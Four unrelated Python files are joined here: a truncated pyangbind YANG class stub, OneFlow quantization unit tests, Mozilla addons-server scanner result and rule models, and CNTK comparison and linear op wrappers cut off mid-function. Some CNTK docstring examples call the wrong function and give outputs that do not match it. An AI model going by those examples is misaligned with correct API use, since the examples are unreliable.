from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class beacon(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-beacon - based on the path /beacon. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
_pyangbind_elements = {}
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import math
import numpy as np
import unittest
import oneflow as flow
import oneflow.typing as oft
import test_global_storage
from test_util import GenArgList, type_name_to_flow_type, type_name_to_np_type
def gen_quant_scale_for_min_max_symmetric(weight, quantization_bit):
weight_max = np.max(np.abs(weight))
denominator = 2.0 ** (quantization_bit - 1) - 1
return weight_max / denominator, 0
def gen_quant_scale_for_min_max_affine(weight, quantization_bit):
weight_max = np.max(weight)
weight_min = np.min(weight)
denominator = 2.0 ** (quantization_bit) - 1
scale = (weight_max - weight_min) / denominator
zero_point = -np.round(weight_min / scale)
return scale, zero_point
def gen_quant_scale_for_min_max_cambricon(weight, quantization_bit):
weight_max = np.max(np.abs(weight))
scale = math.floor(math.log2(weight_max)) - (quantization_bit - 2)
return scale, 0
def product(tu):
return np.prod(tu).astype(np.int).item()
def _check_min_max_observer(
test_case,
weight,
scale_of,
zero_point_of,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
):
if per_layer_quantization or quantization_formula == "cambricon":
outer_num = 1
inner_num = product(weight.shape[0:])
else:
outer_num = weight.shape[0]
inner_num = product(weight.shape[1:])
scale_np = np.zeros((outer_num,))
zero_point_np = np.zeros((outer_num,))
weight_flatten = weight.flatten()
if quantization_formula == "google":
if quantization_scheme == "symmetric":
for c in range(outer_num):
(
scale_np[c],
zero_point_np[c],
) = gen_quant_scale_for_min_max_symmetric(
weight_flatten[c * inner_num : (c + 1) * inner_num],
quantization_bit,
)
else: # "affine"
for c in range(outer_num):
scale_np[c], zero_point_np[c] = gen_quant_scale_for_min_max_affine(
weight_flatten[c * inner_num : (c + 1) * inner_num],
quantization_bit,
)
else: # quantization_formula == "cambricon"
scale_np[0], zero_point_np[0] = gen_quant_scale_for_min_max_cambricon(
weight_flatten, quantization_bit
)
test_case.assertTrue(np.allclose(scale_of, scale_np, rtol=1e-3))
test_case.assertTrue(
np.allclose(
zero_point_of.astype(np.int), zero_point_np.astype(np.int), rtol=1e-3
)
)
def _run_test_min_max_observer(
test_case,
device_type,
device_num,
dtype,
weight_shape,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_num)
else:
flow.config.gpu_device_num(device_num)
@flow.global_function(type="predict", function_config=flow.FunctionConfig())
def QuantizeJob(
weight: oft.Numpy.Placeholder(weight_shape, dtype=type_name_to_flow_type[dtype])
):
with flow.scope.placement(device_type, "0:0-%d" % (device_num - 1)):
scale, zero_point = flow.quantization.min_max_observer(
weight,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
)
return scale, zero_point
weight = (np.random.random(weight_shape) - 0.5).astype(type_name_to_np_type[dtype])
scale, zero_point = QuantizeJob(weight).get()
_check_min_max_observer(
test_case,
weight,
scale.numpy(),
zero_point.numpy(),
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
)
def gen_quant_scale_for_moving_average_min_max_symmetric(
activation, quantization_bit, momentum, moving_max, moving_min
):
activation_max = np.max(np.abs(activation))
denominator = 2.0 ** (quantization_bit - 1) - 1
if moving_max[0] == 0:
moving_max[0] = activation_max
else:
moving_max[0] = moving_max[0] * momentum + activation_max * (1 - momentum)
moving_min[0] = moving_max[0]
return moving_max[0] / denominator, 0
def gen_quant_scale_for_moving_average_min_max_affine(
activation, quantization_bit, momentum, moving_max, moving_min
):
activation_max = np.max(activation)
activation_min = np.min(activation)
denominator = 2.0 ** (quantization_bit) - 1
if moving_max[0] == 0:
moving_max[0] = activation_max
else:
moving_max[0] = moving_max[0] * momentum + activation_max * (1 - momentum)
if moving_min[0] == 0:
moving_min[0] = activation_min
else:
moving_min[0] = moving_min[0] * momentum + activation_min * (1 - momentum)
scale = (moving_max[0] - moving_min[0]) / denominator
zero_point = -np.round(moving_min[0] / scale)
return scale, zero_point
def gen_quant_scale_for_moving_average_min_max_cambricon(
activation, quantization_bit, momentum, moving_max, moving_min
):
activation_max = np.max(np.abs(activation))
if moving_max[0] == 0:
moving_max[0] = activation_max
else:
moving_max[0] = moving_max[0] * momentum + activation_max * (1 - momentum)
moving_min[0] = moving_max[0]
return math.floor(math.log2(moving_max[0])) - (quantization_bit - 2), 0
def _check_moving_average_min_max_observer(
test_case,
activation,
scale_of,
zero_point_of,
moving_max_np,
moving_min_np,
quantization_bit,
quantization_scheme,
quantization_formula,
momentum,
):
if quantization_formula == "google":
if quantization_scheme == "symmetric":
(
scale_np,
zero_point_np,
) = gen_quant_scale_for_moving_average_min_max_symmetric(
activation.flatten(),
quantization_bit,
momentum,
moving_max_np,
moving_min_np,
)
else: # "affine"
scale_np, zero_point_np = gen_quant_scale_for_moving_average_min_max_affine(
activation.flatten(),
quantization_bit,
momentum,
moving_max_np,
moving_min_np,
)
else: # quantization_formula == "cambricon":
scale_np, zero_point_np = gen_quant_scale_for_moving_average_min_max_cambricon(
activation.flatten(),
quantization_bit,
momentum,
moving_max_np,
moving_min_np,
)
test_case.assertTrue(np.allclose(scale_of[0], scale_np, rtol=1e-3))
test_case.assertTrue(np.allclose(zero_point_of[0], zero_point_np, rtol=1e-3))
def _run_test_moving_average_min_max_observer(
test_case,
device_type,
device_num,
dtype,
activation_shape,
quantization_bit,
quantization_scheme,
quantization_formula,
momentum,
):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_num)
else:
flow.config.gpu_device_num(device_num)
@flow.global_function(type="train", function_config=flow.FunctionConfig())
def QuantizeJob(
activation: oft.Numpy.Placeholder(
activation_shape, dtype=type_name_to_flow_type[dtype]
)
):
with flow.scope.placement(device_type, "0:0-%d" % (device_num - 1)):
x = flow.get_variable(
"x",
shape=activation_shape,
dtype=activation.dtype,
initializer=flow.zeros_initializer(activation.dtype),
trainable=True,
)
scale, zero_point = flow.quantization.moving_average_min_max_observer(
activation,
quantization_bit,
quantization_scheme,
quantization_formula,
momentum,
)
fake = x + activation
loss = flow.math.reduce_mean(fake)
flow.optimizer.Adam(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]),
).minimize(loss)
return scale, zero_point
moving_max_np = np.zeros((1,))
moving_min_np = np.zeros((1,))
for i in range(10):
activation = (np.random.random(activation_shape) - 0.5).astype(
type_name_to_np_type[dtype]
)
scale, zero_point = QuantizeJob(activation).get()
_check_moving_average_min_max_observer(
test_case,
activation,
scale.numpy(),
zero_point.numpy(),
moving_max_np,
moving_min_np,
quantization_bit,
quantization_scheme,
quantization_formula,
momentum,
)
def fake_quant_per_layer_symmetric(input, quantization_bit, scale):
upper_bound = 2.0 ** (quantization_bit - 1) - 1
lower_bound = -upper_bound
return np.clip(np.rint(input / scale), lower_bound, upper_bound) * scale
def fake_quant_per_layer_affine(input, quantization_bit, scale, zero_point):
upper_bound = 2.0 ** (quantization_bit) - 1
lower_bound = 0
return (
np.clip(np.rint(input / scale + zero_point), lower_bound, upper_bound)
- zero_point
) * scale
def fake_quant_per_layer_cambricon(input, quantization_bit, shift):
upper_bound = 2.0 ** (quantization_bit - 1) - 1
lower_bound = -upper_bound
scale = 2 ** shift
return np.clip(np.rint(input / scale), lower_bound, upper_bound) * scale
def _check_fake_quantize(
test_case,
input,
input_diff_of,
out_of,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
):
if per_layer_quantization or quantization_formula == "cambricon":
outer_num = 1
inner_num = product(input.shape[0:])
else:
outer_num = input.shape[0]
inner_num = product(input.shape[1:])
scale_np = np.zeros((outer_num,))
zero_point_np = np.zeros((outer_num,))
out_np = np.zeros((inner_num * outer_num,))
input_flatten = input.flatten()
input_diff_np = np.full((inner_num * outer_num,), 1.0 / (inner_num * outer_num))
if quantization_formula == "google":
if quantization_scheme == "symmetric":
for c in range(outer_num):
(
scale_np[c],
zero_point_np[c],
) = gen_quant_scale_for_min_max_symmetric(
input_flatten[c * inner_num : (c + 1) * inner_num], quantization_bit
)
out = fake_quant_per_layer_symmetric(
input_flatten[c * inner_num : (c + 1) * inner_num],
quantization_bit,
scale_np[c],
)
out_np[c * inner_num : (c + 1) * inner_num] = out
else: # "affine"
for c in range(outer_num):
scale_np[c], zero_point_np[c] = gen_quant_scale_for_min_max_affine(
input_flatten[c * inner_num : (c + 1) * inner_num], quantization_bit
)
out = fake_quant_per_layer_affine(
input_flatten[c * inner_num : (c + 1) * inner_num],
quantization_bit,
scale_np[c],
zero_point_np[c],
)
out_np[c * inner_num : (c + 1) * inner_num] = out
else: # quantization_formula == "cambricon"
scale_np[0], zero_point_np[0] = gen_quant_scale_for_min_max_cambricon(
input_flatten, quantization_bit
)
out_np = fake_quant_per_layer_cambricon(
input_flatten, quantization_bit, scale_np[0]
)
test_case.assertTrue(np.allclose(out_of, out_np, rtol=1e-3))
test_case.assertTrue(np.allclose(input_diff_of, input_diff_np, rtol=1e-3))
def _run_test_fake_quantize(
test_case,
device_type,
device_num,
dtype,
in_shape,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_num)
else:
flow.config.gpu_device_num(device_num)
@flow.global_function(type="train", function_config=flow.FunctionConfig())
def QuantizeJob(
input: oft.Numpy.Placeholder(in_shape, dtype=type_name_to_flow_type[dtype])
):
with flow.scope.placement(device_type, "0:0"):
x = flow.get_variable(
"x",
shape=in_shape,
dtype=input.dtype,
initializer=flow.zeros_initializer(input.dtype),
trainable=True,
)
input_x = input + x
flow.watch_diff(input_x, test_global_storage.Setter("input_diff"))
with flow.scope.placement(device_type, "0:0-%d" % (device_num - 1)):
scale, zero_point = flow.quantization.min_max_observer(
input_x,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
)
out = flow.quantization.fake_quantization(
input_x,
scale,
zero_point,
quantization_bit,
quantization_scheme,
quantization_formula,
)
loss = flow.math.reduce_mean(out)
flow.optimizer.Adam(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]),
).minimize(loss)
return out
input = (np.random.random(in_shape) - 0.5).astype(type_name_to_np_type[dtype])
out = QuantizeJob(input).get()
input_diff = test_global_storage.Get("input_diff")
_check_fake_quantize(
test_case,
input,
input_diff.flatten(),
out.numpy().flatten(),
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
)
@unittest.skip("This test possibly fails")
@flow.unittest.skip_unless_1n4d()
class TestMinMaxObserver(flow.unittest.TestCase):
def test_min_max_observer(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["device_num"] = [1, 4]
arg_dict["dtype"] = ["float32", "double"]
arg_dict["weight_shape"] = [(9, 40, 20, 10)]
arg_dict["quantization_bit"] = [8, 2]
arg_dict["quantization_scheme"] = ["symmetric", "affine"]
# TODO(Liang Depeng): Fix cambricon test
arg_dict["quantization_formula"] = ["google"]
arg_dict["per_layer_quantization"] = [True, False]
for arg in GenArgList(arg_dict):
if arg[-2] == "cambricon" and arg[-1] == False:
continue
_run_test_min_max_observer(*arg)
@unittest.skip("This test possibly fails")
class TestMovingAverageMinMaxObserver(flow.unittest.TestCase):
def test_moving_average_min_max_observer(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["cpu", "gpu"]
arg_dict["device_num"] = [1, 4]
arg_dict["dtype"] = ["float32", "double"]
arg_dict["activation_shape"] = [(9, 40, 20, 10)]
arg_dict["quantization_bit"] = [8, 2]
arg_dict["quantization_scheme"] = ["symmetric", "affine"]
# TODO(Liang Depeng): Fix cambricon test
arg_dict["quantization_formula"] = ["google"]
arg_dict["momentum"] = [0.95]
for arg in GenArgList(arg_dict):
_run_test_moving_average_min_max_observer(*arg)
@unittest.skip("This test possibly fails")
@flow.unittest.skip_unless_1n4d()
class TestFakeQuantize(flow.unittest.TestCase):
def test_fake_quantize(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["device_num"] = [1, 4]
arg_dict["dtype"] = ["float32", "double"]
arg_dict["in_shape"] = [(9, 40, 20, 10)]
arg_dict["quantization_bit"] = [8, 2]
arg_dict["quantization_scheme"] = ["symmetric", "affine"]
# TODO(Liang Depeng): Fix cambricon test
arg_dict["quantization_formula"] = ["google"]
arg_dict["per_layer_quantization"] = [True, False]
for arg in GenArgList(arg_dict):
if arg[-2] == "cambricon" and arg[-1] == False:
continue
_run_test_fake_quantize(*arg)
if __name__ == "__main__":
unittest.main()
|
import json
import re
from collections import defaultdict
from datetime import datetime
import yara
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import gettext_lazy as _
from django_jsonfield_backport.models import JSONField
import olympia.core.logger
from olympia.amo.models import ModelBase
from olympia.constants.scanners import (
ABORTED,
ABORTING,
ACTIONS,
COMPLETED,
CUSTOMS,
DELAY_AUTO_APPROVAL,
DELAY_AUTO_APPROVAL_INDEFINITELY,
DELAY_AUTO_APPROVAL_INDEFINITELY_AND_RESTRICT,
FLAG_FOR_HUMAN_REVIEW,
QUERY_RULE_STATES,
MAD,
NEW,
NO_ACTION,
RESULT_STATES,
RUNNING,
SCANNERS,
SCHEDULED,
UNKNOWN,
WAT,
YARA,
)
from olympia.files.models import FileUpload
from olympia.scanners.actions import (
_delay_auto_approval,
_delay_auto_approval_indefinitely,
_delay_auto_approval_indefinitely_and_restrict,
_flag_for_human_review,
_flag_for_human_review_by_scanner,
_no_action,
)
log = olympia.core.logger.getLogger('z.scanners.models')
class AbstractScannerResult(ModelBase):
# Store the "raw" results of a scanner.
results = JSONField(default=list)
scanner = models.PositiveSmallIntegerField(choices=SCANNERS.items())
has_matches = models.BooleanField(null=True)
state = models.PositiveSmallIntegerField(
choices=RESULT_STATES.items(), null=True, blank=True, default=UNKNOWN
)
version = models.ForeignKey(
'versions.Version',
related_name='%(class)ss',
on_delete=models.CASCADE,
null=True,
)
class Meta(ModelBase.Meta):
abstract = True
indexes = [
models.Index(fields=('has_matches',)),
models.Index(fields=('state',)),
]
def add_yara_result(self, rule, tags=None, meta=None):
"""This method is used to store a Yara result."""
self.results.append({'rule': rule, 'tags': tags or [], 'meta': meta or {}})
def extract_rule_names(self):
"""This method parses the raw results and returns the (matched) rule
names. Not all scanners have rules that necessarily match."""
if self.scanner == YARA:
return sorted({result['rule'] for result in self.results})
if self.scanner == CUSTOMS and 'matchedRules' in self.results:
return self.results['matchedRules']
# We do not have support for the remaining scanners (yet).
return []
def save(self, *args, **kwargs):
rule_model = self._meta.get_field('matched_rules').related_model
matched_rules = rule_model.objects.filter(
scanner=self.scanner,
name__in=self.extract_rule_names(),
# See: https://github.com/mozilla/addons-server/issues/13143
is_active=True,
)
self.has_matches = bool(matched_rules)
# Save the instance first...
super().save(*args, **kwargs)
# ...then add the associated rules.
for scanner_rule in matched_rules:
self.matched_rules.add(scanner_rule)
def get_scanner_name(self):
return SCANNERS.get(self.scanner)
def get_pretty_results(self):
return json.dumps(self.results, indent=2)
def get_files_by_matched_rules(self):
res = defaultdict(list)
if self.scanner is YARA:
for item in self.results:
res[item['rule']].append(item['meta'].get('filename', '???'))
elif self.scanner is CUSTOMS:
scanMap = self.results.get('scanMap', {})
for filename, rules in scanMap.items():
for ruleId, data in rules.items():
if data.get('RULE_HAS_MATCHED', False):
res[ruleId].append(filename)
return res
def can_report_feedback(self):
return self.state == UNKNOWN and self.scanner not in [WAT, MAD]
def can_revert_feedback(self):
return self.state != UNKNOWN and self.scanner not in [WAT, MAD]
def get_git_repository(self):
return {
CUSTOMS: settings.CUSTOMS_GIT_REPOSITORY,
YARA: settings.YARA_GIT_REPOSITORY,
}.get(self.scanner)
@classmethod
def run_action(cls, version):
"""Try to find and execute an action for a given version, based on the
scanner results and associated rules.
If an action is found, it is run synchronously from this method, not in
a task.
"""
log.info('Checking rules and actions for version %s.', version.pk)
try:
mad_result = cls.objects.filter(version=version, scanner=MAD).get()
customs = mad_result.results.get('scanners', {}).get('customs', {})
customs_score = customs.get('score', 0.5)
customs_models_agree = customs.get('result_details', {}).get(
'models_agree', True
)
if (
customs_score <= 0.01
or customs_score >= 0.99
or not customs_models_agree
):
log.info('Flagging version %s for human review by MAD.', version.pk)
_flag_for_human_review_by_scanner(version, MAD)
except cls.DoesNotExist:
log.info('No MAD scanner result for version %s.', version.pk)
pass
rule_model = cls.matched_rules.rel.model
result_query_name = cls._meta.get_field('matched_rules').related_query_name()
rule = (
rule_model.objects.filter(
**{f'{result_query_name}__version': version, 'is_active': True}
)
.order_by(
# The `-` sign means descending order.
'-action'
)
.first()
)
if not rule:
log.info('No action to execute for version %s.', version.pk)
return
action_id = rule.action
action_name = ACTIONS.get(action_id, None)
if not action_name:
raise Exception('invalid action %s' % action_id)
ACTION_FUNCTIONS = {
NO_ACTION: _no_action,
FLAG_FOR_HUMAN_REVIEW: _flag_for_human_review,
DELAY_AUTO_APPROVAL: _delay_auto_approval,
DELAY_AUTO_APPROVAL_INDEFINITELY: _delay_auto_approval_indefinitely,
DELAY_AUTO_APPROVAL_INDEFINITELY_AND_RESTRICT: (
_delay_auto_approval_indefinitely_and_restrict
),
}
action_function = ACTION_FUNCTIONS.get(action_id, None)
if not action_function:
raise Exception('no implementation for action %s' % action_id)
# We have a valid action to execute, so let's do it!
log.info('Starting action "%s" for version %s.', action_name, version.pk)
action_function(version)
log.info('Ending action "%s" for version %s.', action_name, version.pk)
class AbstractScannerRule(ModelBase):
name = models.CharField(
max_length=200,
help_text=_('This is the exact name of the rule used by a scanner.'),
)
scanner = models.PositiveSmallIntegerField(choices=SCANNERS.items())
action = models.PositiveSmallIntegerField(
choices=ACTIONS.items(), default=NO_ACTION
)
is_active = models.BooleanField(
default=True,
help_text=_(
'When unchecked, the scanner results will not be bound to this '
'rule and the action will not be executed.'
),
)
definition = models.TextField(null=True, blank=True)
class Meta(ModelBase.Meta):
abstract = True
unique_together = ('name', 'scanner')
@classmethod
def get_yara_externals(cls):
"""
Return a dict with the various external variables we inject in every
yara rule automatically and their default values.
"""
return {
'is_json_file': False,
'is_manifest_file': False,
'is_locale_file': False,
}
def __str__(self):
return self.name
def clean(self):
if self.scanner == YARA:
self.clean_yara()
def clean_yara(self):
if not self.definition:
raise ValidationError(
{'definition': _('Yara rules should have a definition')}
)
if 'rule {}'.format(self.name) not in self.definition:
raise ValidationError(
{
'definition': _(
'The name of the rule in the definition should match '
'the name of the scanner rule'
)
}
)
if len(re.findall(r'rule\s+.+?\s+{', self.definition)) > 1:
raise ValidationError(
{'definition': _('Only one Yara rule is allowed in the definition')}
)
try:
yara.compile(source=self.definition, externals=self.get_yara_externals())
except yara.SyntaxError as syntaxError:
raise ValidationError(
{
'definition': _('The definition is not valid: %(error)s')
% {'error': syntaxError}
}
)
except Exception:
raise ValidationError(
{'definition': _('An error occurred when compiling the definition')}
)
class ScannerRule(AbstractScannerRule):
class Meta(AbstractScannerRule.Meta):
db_table = 'scanners_rules'
class ScannerResult(AbstractScannerResult):
upload = models.ForeignKey(
FileUpload,
related_name='%(class)ss', # scannerresults
on_delete=models.SET_NULL,
null=True,
)
matched_rules = models.ManyToManyField(
'ScannerRule', through='ScannerMatch', related_name='results'
)
# The value is a decimal between 0 and 1. `-1` is a special value to
# indicate an error or no score available.
score = models.DecimalField(
null=True, blank=True, max_digits=6, decimal_places=5, default=-1
)
model_version = models.CharField(max_length=30, null=True)
class Meta(AbstractScannerResult.Meta):
db_table = 'scanners_results'
constraints = [
models.UniqueConstraint(
fields=('upload', 'scanner', 'version'),
name='scanners_results_upload_id_scanner_version_id_ad9eb8a6_uniq',
)
]
class ScannerMatch(ModelBase):
result = models.ForeignKey(ScannerResult, on_delete=models.CASCADE)
rule = models.ForeignKey(ScannerRule, on_delete=models.CASCADE)
class ImproperScannerQueryRuleStateError(ValueError):
pass
class ScannerQueryRule(AbstractScannerRule):
scanner = models.PositiveSmallIntegerField(
choices=((YARA, 'yara'),), # For now code search only allows yara.
default=YARA,
)
state = models.PositiveSmallIntegerField(
choices=QUERY_RULE_STATES.items(), default=NEW
)
run_on_disabled_addons = models.BooleanField(
default=False,
help_text=_('Run this rule on add-ons that have been force-disabled as well.'),
)
celery_group_result_id = models.UUIDField(default=None, null=True)
task_count = models.PositiveIntegerField(default=0)
completed = models.DateTimeField(default=None, null=True, blank=True)
class Meta(AbstractScannerRule.Meta):
db_table = 'scanners_query_rules'
def change_state_to(self, target):
"""Immediately change state of the rule in database or raise
ImproperScannerQueryRuleStateError."""
prereqs = {
# New is the default state.
NEW: (),
# Scheduled should only happen through the admin. It's the
# prerequisite to running the task.
SCHEDULED: (NEW,),
# Running should only happen through the task, after we went
# through the admin to schedule the query.
RUNNING: (SCHEDULED,),
# Aborting can happen from various states.
ABORTING: (NEW, SCHEDULED, RUNNING),
# Aborted should only happen after aborting.
ABORTED: (ABORTING,),
# Completed should only happen through the task
COMPLETED: (RUNNING,),
}
if self.state in prereqs[target]:
props = {
'state': target,
}
if target == COMPLETED:
props['completed'] = datetime.now()
self.update(**props)
else:
raise ImproperScannerQueryRuleStateError()
def _get_completed_tasks_count(self):
if self.celery_group_result_id is not None:
from olympia.amo.celery import app as celery_app
result = celery_app.GroupResult.restore(str(self.celery_group_result_id))
if result:
return result.completed_count()
return None
def completion_rate(self):
if self.state == RUNNING:
completed_tasks_count = self._get_completed_tasks_count()
if completed_tasks_count is not None and self.task_count:
rate = (completed_tasks_count / self.task_count) * 100
return '{:.2f}%'.format(rate)
return None
class ScannerQueryResult(AbstractScannerResult):
# Has to be overridden, because the parent refers to ScannerMatch.
matched_rules = models.ManyToManyField(
'ScannerQueryRule', through='ScannerQueryMatch', related_name='results'
)
was_blocked = models.BooleanField(null=True, default=None)
class Meta(AbstractScannerResult.Meta):
db_table = 'scanners_query_results'
# FIXME indexes, unique constraints ?
class ScannerQueryMatch(ModelBase):
result = models.ForeignKey(ScannerQueryResult, on_delete=models.CASCADE)
rule = models.ForeignKey(ScannerQueryRule, on_delete=models.CASCADE)
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import numpy as np
from ..utils import wrap_numpy_arrays, get_rank
################################################################################
# convolution ops
################################################################################
################################################################################
# evaluation ops
################################################################################
def cross_entropy_with_softmax(target_vector, output_vector, name=None):
"""
This operation computes the cross entropy over the softmax of the `output_vector`.
It expects the `output_vector` as unscaled, and it computes softmax over
the `output_vector` internally. Any `output_vector` input over which softmax is
already computed before passing to this operator will be incorrect.
:math:`cross\_entropy\_with\_softmax(t, o) = {-{\sum_{i \in \{1,len(t)\}} t_i \log(softmax(o_i)) }}`
Example:
>>> C.eval(C.cross_entropy_with_softmax([0., 0., 0., 1.], [1., 1., 1., 50.]))
#[0.]
>>> C.eval(C.cross_entropy_with_softmax([0.35, 0.15, 0.05, 0.45], [1., 2., 3., 4.]))
#[1.84]
Args:
target_vector: usually it is one-hot vector where the hot bit corresponds to the label index. But it can be any probability distribution over the labels.
output_vector: the unscaled computed output values from the network
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import CrossEntropyWithSoftmax
op = CrossEntropyWithSoftmax(target_vector, output_vector, name = name)
wrap_numpy_arrays(op)
op.rank = 0
return op
def square_error(target_matrix, output_matrix, name=None):
"""
This operation computes the sum of the squared difference between elements
in the two input matrices. The result is a scalar (i.e., one by one matrix).
This is often used as a training criterion node.
Example:
>>> C.eval(C.square_error([4., 6.], [2., 1.]))
#[29.]
>>> C.eval(C.square_error([1., 2.], [1., 2.]))
#[0.]
Args:
target_matrix: target matrix, it is usually a one-hot vector where the hot bit corresponds to the label index
output_matrix: the output values from the network
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import SquareError
op = SquareError(target_matrix, output_matrix, name = name)
wrap_numpy_arrays(op)
op.rank = 0
return op
def error_prediction(target_vector, output_vector, name=None):
"""
This operation computes the prediction error. It finds the index of the highest
value in the output_vector and compares it to the actual ground truth label
(the index of the hot bit in the target vector). The result is a scalar
(i.e., one by one matrix). This is often used as an evaluation criterion.
It cannot be used as a training criterion though since the gradient is not
defined for it.
Example:
>>> C.eval(C.error_prediction([0., 0., 0., 1.], [1., 2., 3., 4.]))
#[0.]
>>> C.eval(C.error_prediction([0., 0., 1., 0.], [1., 2., 3., 4.]))
#[1.]
Args:
target_vector: it is one-hot vector where the hot bit corresponds to the label index
output_vector: the output values from the network
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import ErrorPrediction
op = ErrorPrediction(target_vector, output_vector, name = name)
wrap_numpy_arrays(op)
op.rank = 0
return op
################################################################################
# comparison ops
################################################################################
def less(left, right, name=None):
"""
Elementwise 'less' comparison of two tensors. Result is 1 if left < right else 0.
Example:
>>> C.eval(C.less([41., 42., 43.], [42., 42., 42.]))
[array([[1., 0., 0.]])]
>>> C.eval(C.eq([-1,0,1], [0]))
[array([[1., 0., 0.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Less
op = Less(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def equal(left, right, name=None):
"""
Elementwise 'equal' comparison of two tensors. Result is 1 if values are equal 0 otherwise.
Example:
>>> C.eval(C.equal([41., 42., 43.], [42., 42., 42.]))
[array([[0., 1., 0.]])]
>>> C.eval(C.eq([-1,0,1], [1]))
[array([[0., 1., 0.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Equal
op = Equal(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def greater(left, right, name=None):
"""
Elementwise 'greater' comparison of two tensors. Result is 1 if left > right else 0.
Example:
>>> C.eval(C.greater([41., 42., 43.], [42., 42., 42.]))
[array([[0., 0., 1.]])]
>>> C.eval(C.greater([-1,0,1], [0]))
[array([[1., 0., 1.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Greater
op = Greater(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def greater_equal(left, right, name=None):
"""
Elementwise 'greater equal' comparison of two tensors. Result is 1 if left >= right else 0.
Example:
>>> C.eval(C.greater_equal([41., 42., 43.], [42., 42., 42.]))
[array([[0., 1., 1.]])]
>>> C.eval(C.greater_equal([-1,0,1], [0]))
[array([[0., 1., 1.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import GreaterEqual
op = GreaterEqual(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def not_equal(left, right, name=None):
"""
Elementwise 'not equal' comparison of two tensors. Result is 1 if left != right else 0.
Example:
>>> C.eval(C.not_equal([41., 42., 43.], [42., 42., 42.]))
[array([[1., 0., 1.]])]
>>> C.eval(C.eq([-1,0,1], [0]))
[array([[1., 0., 1.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import NotEqual
op = NotEqual(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def less_equal(left, right, name=None):
"""
Elementwise 'less equal' comparison of two tensors. Result is 1 if left <= right else 0.
Example:
>>> C.eval(C.less_equal([41., 42., 43.], [42., 42., 42.]))
[array([[1., 1., 0.]])]
>>> C.eval(C.eq([-1,0,1], [0]))
[array([[1., 1., 0.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import LessEqual
op = LessEqual(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
################################################################################
# linear ops
################################################################################
def plus(left, right, name=None):
"""
The output of this operation is the sum of the two input tensors. It supports broadcasting.
In case of scalars its backward pass propagates the received gradient.
The operator (+) has been overloaded and can equally be used instead of plus()
Example:
>>> C.eval(C.plus([1, 2, 3], [4, 5, 6]))
[array([[ 5., 7., 9.]])]
>>> C.eval(C.plus([-5, -4, -3, -2, -1], [10]))
[array([[ 5., 6., 7., 8., 9.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Plus
